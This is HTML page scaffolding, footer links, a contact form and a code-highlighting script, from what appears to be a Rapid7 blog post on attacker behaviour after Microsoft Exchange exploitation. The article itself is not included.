<a class="link" href="tel:866-772-7437">+1-866-772-7437 (Toll Free)</a> <div class="footer__breach"> <div class="footer__breach-title">Need to report an Escalation or a Breach?</div> <div class="footer__breach-contact"> <a aria-role="button" href="/services/incident-response-customer-escalation/" class="button mdBtn btn-primary r7-icon-lightning-bolt">Get Help</a> </div> </div> </div> <div class="footer__links-section footer__solutions"> <div class="footer__links-title">SOLUTIONS</div> <a class="link" href="/platform/">The Command Platform</a> <a class="link" href="/products/command/exposure-management/">Exposure Command</a> <a class="link" href="/services/managed-detection-and-response-mdr/">Managed Threat Complete</a> </div> </div> <div class="footer__links-col"> <div class="footer__links-section footer__support"> <div class="footer__links-title">SUPPORT & RESOURCES</div> <a class="link" href="https://www.rapid7.com/for-customers/">Product Support</a> <a class="link" href="https://www.rapid7.com/resources/">Resource Library</a> <a class="link" href="https://www.rapid7.com/customers/">Our Customers</a> <a class="link" href="https://www.rapid7.com/about/events-webcasts/">Events & Webcasts</a> <a class="link" href="https://www.rapid7.com/services/training-certification/">Training & Certification</a> <a class="link" href="https://www.rapid7.com/fundamentals/">Cybersecurity Fundamentals</a> <a class="link" href="https://www.rapid7.com/db/">Vulnerability & Exploit Database</a> </div> <div class="footer__links-section footer__about"> <div class="footer__links-title">ABOUT US</div> <a class="link" href="https://www.rapid7.com/about/company/">Company</a> <a class="link" href="https://www.rapid7.com/about/diversity-equity-and-inclusion/">Diversity, Equity, and Inclusion</a> <a class="link" href="https://www.rapid7.com/about/leadership/">Leadership</a> <a class="link" href="https://www.rapid7.com/about/news/">News & Press Releases</a> <a class="link" href="https://www.rapid7.com/about/public-policy/">Public Policy</a> <a class="link" href="https://www.rapid7.com/open-source/">Open Source</a> <a class="link" href="https://investors.rapid7.com/overview/default.aspx">Investors</a> </div> </div> <div class="footer__links-col"> <div class="footer__links-section footer__connect"> <div class="footer__links-title">CONNECT WITH US</div> <a class="link" href="https://www.rapid7.com/contact/">Contact</a> <a class="link" href="https://www.rapid7.com/blog/">Blog</a> <a class="link" href="https://insight.rapid7.com/login">Support Login</a> <a class="link" href="https://careers.rapid7.com/careers-home">Careers</a> <div class="footer__links-social"> <a class="linkedin no-new-open" aria-label="LinkedIn" href="https://www.linkedin.com/company/39624" target="_blank"></a> <a class="twitter-x no-new-open" aria-label="Twitter" href="https://twitter.com/Rapid7" target="_blank"></a> <a class="facebook no-new-open" aria-label="Facebook" href="https://www.facebook.com/rapid7" target="_blank"></a> <a class="instagram no-new-open" aria-label="Instagram" href="https://www.instagram.com/rapid7/" target="_blank"></a> </div> </div> </div> </div> </section> </div> <section class="footer__legal"> <div class="grid-container"> <div class="grid-x grid-padding-x"> <div class="medium-10 medium-offset-1 cell"> <div class="footer__legal-copyright">© Rapid7</div> <div class="footer__legal-link"><a href="/legal/">Legal Terms</a></div>   |   <div class="footer__legal-link"><a href="/privacy-policy/">Privacy Policy</a></div>   |   <div class="footer__legal-link"><a href="/export-notice/">Export Notice</a></div>   |   <div class="footer__legal-link"><a href="/trust/">Trust</a></div>   |   <div class="footer__legal-link"><a href=""><a href="#" onclick="OneTrust.ToggleInfoDisplay(); return false;"> Do Not Sell or Share My Personal Information</a></a></div>   |   <div class="footer__legal-link"><a href=""><a href="#" onclick="OneTrust.ToggleInfoDisplay(); return false;">Cookie Preferences</a></a></div> </div> </div> </div> </section> <section class="contact-sticky"> <div class="grid-container"> <div class="grid-x grid-padding-x expanded"> <div id="stickyButtons" class="cell driftInit"> <div class="contactBtn"> <a id="sticky_contact_btn" role="button" tabindex="0" class="gray button"> Contact Us </a> </div> </div> </div> </div> </section> <div class="reveal light hasSidebar" id="stickyContact" data-reveal> <section class="contactForm"> <div class="grid-container"> <div class="grid-x grid-padding-x"> <div class="large-9 cell"> <form id="contactModal" class="formBlock freemail mkto contactModal" data-block-name="Contact Form Block"> <div id="intro"> <div id="thankyouText" style="display:none;" class="messageBox green"> <h4><span class="success">Success!</span> Thank you for submission. We will be in touch shortly.</h4> </div> <div id="errorText" style="display:none;" class="messageBox red"> <h4><span class="error">Oops!</span> There was a problem in submission. Please try again.</h4> </div> <div> <h2>Submit your information and we will get in touch with you.</h2> </div> </div> <fieldset> <p id="fieldInstruction" class="instructions">All fields are mandatory</p> <dl> <dd> <label for="firstName">First Name</label> <input id="firstName" type="text" name="firstName" autocomplete="given-name"> </dd> </dl> <dl> <dd> <label for="lastName">Last Name</label> <input id="lastName" type="text" name="lastName" autocomplete="family-name"> </dd> </dl> <dl> <dd> <label for="jobTitle">Job Title</label> <input id="jobTitle" type="text" name="jobTitle" autocomplete="organization-title"> </dd> </dl> <dl> <dd> <label for="jobLevel">Job Level</label> <select name="jobLevel" id="jobLevel" class="normalSelect dropdownSelect"> <option value="0">Job Level</option> <option value="Analyst">Analyst</option> <option value="System/Security Admin">System/Security Admin</option> <option value="Manager">Manager</option> <option value="Director">Director</option> <option value="VP">VP</option> <option value="CxO">CxO</option> <option value="Student">Student</option> <option value="Other">Other</option> </select> </dd> </dl> <dl> <dd> <label for="companyName">Company</label> <input id="companyName" type="text" name="companyName" autocomplete="organization"> </dd> </dl> <dl> <dd> <label for="email">Email</label> <input id="email" type="text" name="email" autocomplete="email"> </dd> </dl> <dl> <dd> <div class="intl-phone"> <label for="phone">Phone</label> <div class="flag-container"> <div class="selected-flag"> <div class="iti-flag"></div> </div> <ul class="country-list"></ul> </div> <input id="phone" type="text" name="phone" autocomplete="tel-national" /> </div> </dd> </dl> <dl> <dd> <label for="country">Country</label> <select name="country" id="country" class="form_SelectInstruction normalSelect" onchange="updateCountryData('#contactModal');"></select> </dd> </dl> <dl> <dd> <label for="state">State</label> <select name="state" id="state" class="form_SelectInstruction normalSelect dropdownSelect"></select> </dd> </dl> <dl class="clearfix expand"> <dd> <label for="contactType">Reason for Contact</label> <select name="contactType" id="contactType" class="normalSelect dropdownSelect"> <option value="0">- Select -</option> <option value="20437" data-subopts="20437|Request a Demo;20438|Get Pricing Info;20439|General">I'd like to learn more about vulnerability management</option> <option value="20440" data-subopts="20440|Request a Demo;20441|Get Pricing Info;20442|General">I'd like to learn more about application security</option> <option value="20443" data-subopts="20443|Request a Demo;20444|Get Pricing Info;20445|General">I'd like to learn more about incident detection and response</option> <option value="20433" data-subopts="20433|Request a Demo;20446|Get Pricing Info;20447|General">I'd like to learn more about cloud security</option> <option value="20448" data-subopts="">I'd like to learn more about Rapid7 professional or managed services</option> <option value="20450" data-subopts="">I'd like to learn more about visibility, analytics, and automation</option> <option value="20434" data-subopts="20434|Request a Demo;20435|Get Pricing Info;20436|General">I'd like to learn more about building a comprehensive security program</option> <option value="21019" data-subopts="21019|Request a demo;21021|Get Pricing Info;21020|General">I'd like to learn more about threat intelligence.</option> </select> </dd> </dl> <dl class="clearfix expand" id="contactTypeSecondaryParent" style="display:none;"> <dd> <label for="contactTypeSecondary" class="sr-only">- Select -</label> <select name="contactTypeSecondary" id="contactTypeSecondary" class="normalSelect dropdownSelect"> <option value="0">- Select -</option> </select> </dd> </dl> <dl class="clearfix expand hide" id="howDidYouHearParent" > <dd> <label for="howDidYouHear">How did you hear about us?</label> <input id="howDidYouHear" type="text" name="howDidYouHear"> </dd> </dl> <dl class="expand" id="consultant" style="display: none;"> <dd> <input id="consultantField" type="checkbox" class="r7-check"> <label for="consultantField">I am a consultant, partner, or reseller.</label> </dd> </dl> <dl class="expand checkboxContainer" id="optout" style="display:none;"> <dd> <input id="explicitOptOut" type="checkbox" class="r7-check"> <label for="explicitOptOut">I do not want to receive emails regarding Rapid7's products and services.</label> </dd> <dd> <div class="disc"> <p>Issues with this page? Please email <a href="mailto:info@rapid7.com">info@rapid7.com</a>. Please see updated <a href="/privacy-policy/">Privacy Policy</a></p> </div> </dd> </dl> <dl class="expand captchaDisclaimer"> <dd> <p class="text-left" style="font-size: 0.75rem; line-height: 1.25rem;">This site is protected by reCAPTCHA and the Google <a href="https://policies.google.com/privacy" target="_blank">Privacy Policy</a> and <a href="https://policies.google.com/terms" target="_blank">Terms of Service</a> apply.</p> </dd> </dl> <dl class="captchaBlock"> <dd> <div class="g-recaptcha" data-size="invisible" data-sitekey="6Lc2JFwaAAAAAI4X5Ix2Jxu7lyXDUVm1U3sATX7a"></div> </dd> </dl> <dl class="expand"> <dd><button class="submit button btn-primary mdBtn">Submit</button></dd> </dl> <input type="hidden" id="formName" value="ContactPage"> <input type="hidden" id="contactUsFormURL" value="https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/"> <input type="hidden" id="landorExpand" value="land"> </fieldset> </form> <script src="//www.google.com/recaptcha/api.js?hl=en&render=6Lc2JFwaAAAAAI4X5Ix2Jxu7lyXDUVm1U3sATX7a"></script> </div> <div class="large-3 cell sidebar"> <p><img class="logo" src="/includes/img/logo-black.png" alt="Rapid7 logo" data-src="/includes/img/logo-black.png"></p> <h3>General:</h3> <p><a href="mailto:info@rapid7.com">info@rapid7.com</a></p> <h3>Sales:</h3> <p><a href="tel:1-866-772-7437">+1-866-772-7437</a><br><a href="mailto:sales@rapid7.com">sales@rapid7.com</a></p> <h3>Support:</h3> <p><a href="tel:1-866-390-8113">+1–866–390–8113 (toll free)</a><br><a href="mailto:support@rapid7.com">support@rapid7.com</a></p> <h3>Incident Response:</h3> <p><a href="tel:1-844-787-4937">1-844-727-4347</a></p> <p><a class="view_more" href="/contact/">More Contact Info</a></p> </div> </div> </div> </section> <button class="close-button" data-close="" aria-label="Close reveal" type="button"></button> </div> </footer> <div class="reveal light" id="modal-subscribe" data-reveal> <h2>Never miss a blog</h2> <p>Get the latest stories, expertise, and news about security today.</p> <form id="mktoForm_4144"></form> <div id="thankyou" style="display: none;">You’re almost done! <br> Check your email to confirm your subscription.</div> <script> if (typeof MktoForms2 === 'undefined') { $('body').addClass('load'); } else { MktoForms2.loadForm("//information.rapid7.com", "411-NAK-970", 4144, function (form) { form.onSuccess(function (values, followUpUrl) { window.dataLayer.push({ 'event': 'form_submit_success' }); form.getFormElem().hide(); document.getElementById("thankyou").style.display = "block"; return false; }); }); } </script> <button class="close-button" data-close="" aria-label="Close reveal" type="button"></button> </div> </div> </div> </div>  <script src="/includes/js/all.min.js?cb=1731962207034"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/highlight.min.js"></script> <script> (function ($) { $(document).ready(function () { // Handle subscribe button click $('.subscribe-btn').on('click', function () { $('#modal-subscribe').foundation('open'); }); }); $(window).on("load", function () { // Highlight Metasploit console snippets hljs.registerLanguage('msf', function () { return { name: 'msf', keywords: {}, contains: [ { scope: 'prompt.name', begin: '^(msf\\d?|meterpreter)', relevance: 10 }, { begin: ' (exploit|payload|auxiliary|encoder|evasion|post|nop)\$', end: '>', scope: 'test', contains: [ { scope: 'prompt.mod', begin: '(?!\\()([\\w/]+)(?=\$)' }, ] }, { scope: 'error', begin: '^\\[\\-\\]' }, { scope: 'good', begin: '^\\[\\+\\]' }, { scope: 'status', begin: '^\\[\\*\\]' }, { scope: 'warning', begin: '^\\[\\!\\]' }, hljs.QUOTE_STRING_MODE ], illegal: '\\S' }; }); hljs.highlightAll(); }); })(jQuery); </script> <script></script> <script src="/includes/js/bundles/shared/vidyard.min.js?cb=1731962207034" async defer></script> <script src="/includes/js/bundles/blocks/block.blog-tags-list.min.js?cb=1731962207034" async defer></script> <style type="text/css"> .blog-single-post__main-column .post-content a.subscribe-btn { color:#fff; } </style> </body> </html>

CINXE.COM

Analyzing Attacker Behavior Post-Exploitation of MS Exchange | Rapid7 Blog